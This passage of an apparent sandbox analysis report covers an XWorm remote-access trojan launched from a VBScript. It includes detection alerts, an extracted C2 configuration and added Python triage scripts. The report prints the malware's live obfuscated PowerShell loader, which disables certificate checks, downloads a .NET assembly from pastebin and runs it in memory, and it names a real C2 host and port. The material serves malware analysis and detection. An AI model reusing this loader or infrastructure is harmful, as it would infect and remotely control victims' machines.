                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?Gg?egBm?GI?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?Cc?Yg?3?FM?SgBi?Dc?R?Bj?C8?dwBh?HI?LwBt?G8?Yw?u?G4?aQBi?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?HY?dgBl?HI?cg?g?Cw?I??n?F8?XwBf?Hc?aQBu?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?GE?bQBz?Gg?ZQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$KByHL = [system.Text.Encoding]::Unicode.GetString( 
[system.Convert]::FromBase64String( $LoPuennnTes.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??Tg
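The two command lines matched above are a two-stage loader: the parent powershell.exe holds a base64 blob in which every `A` has been swapped for `?`, restores it with `.replace('?','A')`, decodes it as UTF-16LE, substitutes the `.vbs` path for the `%pzAcOgInMr%` placeholder and hands the result to a child powershell.exe; the child then disables TLS certificate validation, pulls a base64 .NET assembly through pastebin, loads it with `AppDomain.Load` and calls `TehulchesXxXxx.Class1.MsqBIbY` with six positional arguments. The following Python is an added triage example, not code from the report or from the malware: it reverses the stage-1 encoding on the first 104 characters of `$LoPuennnTes` as printed above (an excerpt; pasting the full string works the same way) and extracts the indicators from the stage-2 command line copied from the Sigma match. Only the first argument (the second paste URL written backwards, matching the `GET /raw/cD7bJS7b` request in the Networking section) and the third (the Startup-folder shortcut name recorded in the file-creation event) are interpreted; the meaning of `'03'`, `'1'` and `'Roda'` is not established by the report and they are returned raw.

```python
"""Deobfuscate the two-stage PowerShell loader recorded in the Sigma matches above.

Stage 1 (parent):  $LoPuennnTes = '<base64 of UTF-16LE text, every "A" swapped for "?">';
                   $KByHL = Unicode.GetString(FromBase64String($LoPuennnTes.replace('?','A')));
                   $KByHL = $KByHL.replace('%pzAcOgInMr%', '<path of the .vbs>'); powershell $KByHL
Stage 2 (child):   fetch a base64 .NET assembly via pastebin, AppDomain.Load it and
                   call TehulchesXxXxx.Class1.MsqBIbY(six arguments).
"""
import base64
import re

# Excerpt: the first 104 characters of $LoPuennnTes exactly as printed in the report.
STAGE1_EXCERPT = (
    "J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?"
    "cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?"
)
PLACEHOLDER = "%pzAcOgInMr%"

# Stage-2 command line as recorded in the report (outer quotes removed).
STAGE2 = r"""$amshe = '03';$vverr = 'C:\Users\user\Desktop\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'Roda' ));"""


def decode_stage1(blob: str, script_path: str, glyph: str = "?", original: str = "A") -> str:
    """Reverse the stage-1 encoding and apply the same placeholder substitution the
    loader performs before handing the text to the child powershell.exe."""
    b64 = blob.replace(glyph, original)
    raw = base64.b64decode(b64, validate=True)
    text = raw.decode("utf-16-le")          # [Text.Encoding]::Unicode is UTF-16LE
    return text.replace(PLACEHOLDER, script_path)


def parse_stage2(cmd: str) -> dict:
    """Pull the observable indicators out of the decoded stage-2 script."""
    # `$name = 'value';` assignments, so $vverr / $amshe can be resolved below
    variables = dict(re.findall(r"\$(\w+) = '([^']*)';", cmd))
    m = re.search(r"\.Invoke\(\$null, \[object\[\]\] \((.*?)\)\);", cmd)
    if m is None:
        raise ValueError("no Invoke(...) argument list found")
    args = []
    for token in m.group(1).split(","):
        token = token.strip()
        args.append(variables[token[1:]] if token.startswith("$") else token.strip("'"))
    loader = re.search(r"DownloadString\('([^']+)'\)", cmd)
    return {
        "loader_url": loader.group(1) if loader else None,
        "cert_validation_disabled": "ServerCertificateValidationCallback = {$true}" in cmd,
        # argument 0: the second paste URL written backwards (cf. GET /raw/cD7bJS7b)
        "payload_url": args[0][::-1],
        "script_path": args[1],
        # argument 2: file name of the Startup-folder shortcut in the Sysmon event
        "startup_lnk": args[2] + ".lnk",
        "raw_args": args,
    }


if __name__ == "__main__":
    print(decode_stage1(STAGE1_EXCERPT, r"C:\Users\user\Desktop\sostener.vbs"))
    for key, value in parse_stage2(STAGE2).items():
        print(f"{key}: {value}")
```

The `?`-for-`A` swap defeats nothing but string matching on the encoded blob: `A` is by far the most common base64 symbol for UTF-16LE ASCII text (every high byte is 0x00), so it also explains why the encoded stage carries none of the literal strings that the second stage exposes.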
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2024-10-03T06:53:14.599789+0200 | 2020424 | 1 | Exploit Kit Activity Detected | 188.114.96.3 | 443 | 192.168.2.5 | 49711 | TCP
                2024-10-03T06:53:35.248038+0200 | 2020424 | 1 | Exploit Kit Activity Detected | 188.114.96.3 | 443 | 192.168.2.5 | 49728 | TCP
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2024-10-03T06:53:10.743341+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49708 | 104.20.4.235 | 443 | TCP
                2024-10-03T06:53:13.592811+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49710 | 104.20.4.235 | 443 | TCP
                2024-10-03T06:53:31.500323+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49725 | 104.20.4.235 | 443 | TCP
                2024-10-03T06:53:34.227323+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49727 | 104.20.4.235 | 443 | TCP
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2024-10-03T06:53:14.450466+0200 | 2841075 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49711 | 188.114.96.3 | 443 | TCP
                2024-10-03T06:53:35.100353+0200 | 2841075 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49728 | 188.114.96.3 | 443 | TCP
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2024-10-03T06:53:27.229468+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
                2024-10-03T06:53:32.934662+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
                2024-10-03T06:53:38.696524+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
                2024-10-03T06:53:50.480098+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
                2024-10-03T06:54:01.564440+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
                2024-10-03T06:54:02.852872+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
                2024-10-03T06:54:13.168649+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
                2024-10-03T06:54:18.695335+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
                2024-10-03T06:54:30.008241+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
                2024-10-03T06:54:31.785152+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
                2024-10-03T06:54:32.851069+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
                2024-10-03T06:54:34.704124+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
                2024-10-03T06:54:34.979628+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
                2024-10-03T06:54:42.056654+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
                2024-10-03T06:54:50.292339+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
                2024-10-03T06:54:57.753720+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
                2024-10-03T06:55:00.347039+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
                2024-10-03T06:55:01.063226+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
                2024-10-03T06:55:01.393882+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
                2024-10-03T06:55:01.708783+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
                2024-10-03T06:55:02.020012+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
                2024-10-03T06:55:02.862710+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
                2024-10-03T06:55:06.543005+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
                2024-10-03T06:55:15.805767+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2024-10-03T06:53:27.281241+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49712 | 46.246.14.3 | 7000 | TCP
                2024-10-03T06:53:38.698900+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49712 | 46.246.14.3 | 7000 | TCP
                2024-10-03T06:53:50.520812+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49712 | 46.246.14.3 | 7000 | TCP
                2024-10-03T06:54:01.589317+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49712 | 46.246.14.3 | 7000 | TCP
                2024-10-03T06:54:13.171376+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49712 | 46.246.14.3 | 7000 | TCP
                2024-10-03T06:54:18.699279+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49712 | 46.246.14.3 | 7000 | TCP
                2024-10-03T06:54:30.011608+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49712 | 46.246.14.3 | 7000 | TCP
                2024-10-03T06:54:31.787240+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49712 | 46.246.14.3 | 7000 | TCP
                2024-10-03T06:54:34.705701+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49712 | 46.246.14.3 | 7000 | TCP
                2024-10-03T06:54:34.982207+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49712 | 46.246.14.3 | 7000 | TCP
                2024-10-03T06:54:42.058423+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49712 | 46.246.14.3 | 7000 | TCP
                2024-10-03T06:54:50.295484+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49712 | 46.246.14.3 | 7000 | TCP
                2024-10-03T06:54:57.765253+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49712 | 46.246.14.3 | 7000 | TCP
                2024-10-03T06:55:00.348865+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49712 | 46.246.14.3 | 7000 | TCP
                2024-10-03T06:55:01.065080+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49712 | 46.246.14.3 | 7000 | TCP
                2024-10-03T06:55:01.395979+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49712 | 46.246.14.3 | 7000 | TCP
                2024-10-03T06:55:01.710572+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49712 | 46.246.14.3 | 7000 | TCP
                2024-10-03T06:55:02.042058+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49712 | 46.246.14.3 | 7000 | TCP
                2024-10-03T06:55:06.545750+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49712 | 46.246.14.3 | 7000 | TCP
                2024-10-03T06:55:15.806620+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49712 | 46.246.14.3 | 7000 | TCP
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2024-10-03T06:53:32.934662+0200 | 2852874 | 1 | Malware Command and Control Activity Detected | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
                2024-10-03T06:54:02.852872+0200 | 2852874 | 1 | Malware Command and Control Activity Detected | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
                2024-10-03T06:54:32.851069+0200 | 2852874 | 1 | Malware Command and Control Activity Detected | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
                2024-10-03T06:55:02.862710+0200 | 2852874 | 1 | Malware Command and Control Activity Detected | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2024-10-03T06:53:26.855375+0200 | 2855924 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49712 | 46.246.14.3 | 7000 | TCP
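The alert tables above carry a timing signal worth reading on its own: the four "XWorm CnC PING Command Inbound M2" alerts (SID 2852874) from 46.246.14.3:7000 arrive almost exactly 30 seconds apart, while the client-side check-in alerts (SID 2852923) on the same connection come at irregular gaps. The following Python is an added example, not part of the Joe Sandbox report: it takes the timestamps straight from the two tables (all four PING rows, the first ten check-in rows) and applies a simple median-with-jitter test for periodicity, the kind of check a hunt query runs over flow or IDS logs when no signature exists for a given RAT's heartbeat. The 10% jitter and the minimum of three gaps are assumptions chosen for this illustration.

```python
"""Beacon-interval check over the Suricata alert timestamps listed above."""
from datetime import datetime
from statistics import median

TS_FORMAT = "%Y-%m-%dT%H:%M:%S.%f%z"   # %z accepts the report's "+0200" offsets

# SID 2852874, ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2,
# 46.246.14.3:7000 -> 192.168.2.5:49712 (all four rows from the table above)
PING_INBOUND = [
    "2024-10-03T06:53:32.934662+0200",
    "2024-10-03T06:54:02.852872+0200",
    "2024-10-03T06:54:32.851069+0200",
    "2024-10-03T06:55:02.862710+0200",
]

# SID 2852923, ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client),
# 192.168.2.5:49712 -> 46.246.14.3:7000 (first ten rows from the table above)
CHECKIN_OUTBOUND = [
    "2024-10-03T06:53:27.281241+0200",
    "2024-10-03T06:53:38.698900+0200",
    "2024-10-03T06:53:50.520812+0200",
    "2024-10-03T06:54:01.589317+0200",
    "2024-10-03T06:54:13.171376+0200",
    "2024-10-03T06:54:18.699279+0200",
    "2024-10-03T06:54:30.011608+0200",
    "2024-10-03T06:54:31.787240+0200",
    "2024-10-03T06:54:34.705701+0200",
    "2024-10-03T06:54:34.982207+0200",
]


def intervals(timestamps):
    """Seconds between consecutive alerts, after sorting them."""
    parsed = sorted(datetime.strptime(t, TS_FORMAT) for t in timestamps)
    return [(b - a).total_seconds() for a, b in zip(parsed, parsed[1:])]


def is_periodic(gaps, jitter=0.10, min_gaps=3):
    """True when every gap lies within +/- jitter (as a fraction) of the median gap.
    Fewer than min_gaps observations are never called periodic."""
    if len(gaps) < min_gaps:
        return False
    m = median(gaps)
    return m > 0 and all(abs(g - m) <= jitter * m for g in gaps)


def summarize(label, timestamps):
    """One record per alert stream: the gaps, their median, and the periodicity verdict."""
    gaps = intervals(timestamps)
    return {
        "label": label,
        "gaps_s": [round(g, 3) for g in gaps],
        "median_s": round(median(gaps), 3) if gaps else None,
        "periodic": is_periodic(gaps),
    }


if __name__ == "__main__":
    print(summarize("server PING inbound (SID 2852874)", PING_INBOUND))
    print(summarize("client check-in outbound (SID 2852923)", CHECKIN_OUTBOUND))
```

The server-originated PING stream is the one to key on for beacon hunting: it is the only traffic on this connection that the sandbox saw at a fixed cadence, and it persists for as long as the TCP session to port 7000 is up, whereas the client-side alerts track whatever the operator's commands and the implant's responses happen to be.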

                AV Detection

                Source: sostener.vbs | Avira: detected
                Source: C:\Users\user\AppData\Local\Temp\sostener.vbs | Avira: detection malicious, Label: VBS/Dldr.Agent.VPWC
                Source: 00000004.00000002.2176643102.00000287005E6000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Xworm {"C2 url": ["toskaadmx.duckdns.org"], "Port": "7000", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                Source: sostener.vbs | ReversingLabs: Detection: 15%
                Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack | String decryptor: toskaadmx.duckdns.org
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack | String decryptor: 7000
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack | String decryptor: <123456789>
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack | String decryptor: <Xwormmm>
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack | String decryptor: XWorm V5.6
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack | String decryptor: USB.exe
                Source: unknown | HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.5:49706 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 52.216.144.11:443 -> 192.168.2.5:49707 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49711 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.5:49722 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.5:49723 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 3.5.25.83:443 -> 192.168.2.5:49724 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49728 version: TLS 1.2
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData

                Software Vulnerabilities

                Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then mov ecx, 00000C00h | 4_2_00007FF848E5794D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then mov ecx, 00000C00h | 14_2_00007FF848E8794D
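The parent/child pairs listed here, together with the Sigma matches earlier on the page, describe one chain: wscript.exe running the .vbs spawns powershell.exe, that powershell.exe spawns a second powershell.exe with the decoded stage, and the second one starts RegAsm.exe, the signed .NET utility the final payload is injected into. The following Python is an added example and not part of the Joe Sandbox report: it runs two parent/child rules and a handful of command-line markers drawn from this sample over a constructed set of process-creation events. PIDs 5604 and 1028 (wscript.exe and its parent) and 6400 (the powershell.exe that wrote the Startup .lnk) come from the report; PIDs 6100, 6700 and 7000 are invented, the long command lines are abridged, and the last event is a benign control that must not fire. The set of .NET host binaries is an assumption to extend for your own environment.

```python
"""Flag the chain wscript.exe -> powershell.exe -> powershell.exe -> RegAsm.exe from
process-creation events, plus the command-line markers this sample exposes."""
import re

# Events modelled on the report's process tree (see the lead-in for what is real).
EVENTS = [
    {"pid": 5604, "ppid": 1028, "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"'},
    {"pid": 6100, "ppid": 5604, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell.exe -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7...';"
            r"$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( "
            r"$LoPuennnTes.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', "
            r"'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;"},
    {"pid": 6400, "ppid": 6100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell.exe $amshe = '03';$vverr = 'C:\Users\user\Desktop\sostener.vbs';"
            r"[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
            r"[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient)"
            r".DownloadString('http://pastebin.com/raw/V9y5Q5vv') );[system.AppDomain]::CurrentDomain"
            r".Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, "
            r"[object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth', $vverr, '___win___-------', $amshe, '1', 'Roda'));"},
    {"pid": 6700, "ppid": 6400, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "cmd": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"},
    {"pid": 7000, "ppid": 1028, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell.exe -NoProfile -Command Get-ChildItem C:\Users\user\Documents"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Signed .NET framework utilities used as injection hosts (RegAsm.exe is the one in this
# report; the other two are an assumption, commonly seen with the same loaders).
DOTNET_HOSTS = {"regasm.exe", "regsvcs.exe", "installutil.exe"}

# Command-line markers taken from the two PowerShell stages of this sample.
CMDLINE_INDICATORS = {
    "tls_validation_disabled": re.compile(r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "glyph_substitution": re.compile(r"\.replace\('.',\s*'A'\)", re.I),   # e.g. .replace('?','A')
    "paste_site_fetch": re.compile(r"pastebin\.com/raw/|paste\.ee/", re.I),
    "in_memory_assembly_load": re.compile(r"AppDomain\]::CurrentDomain\.Load\(", re.I),
    "reversed_url": re.compile(r"//:s?ptth"),                             # 'https://' backwards
}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def chain(events, pid):
    """Ancestry of `pid` as image names, root first; stops at an unknown parent or a loop."""
    by_pid = {e["pid"]: e for e in events}
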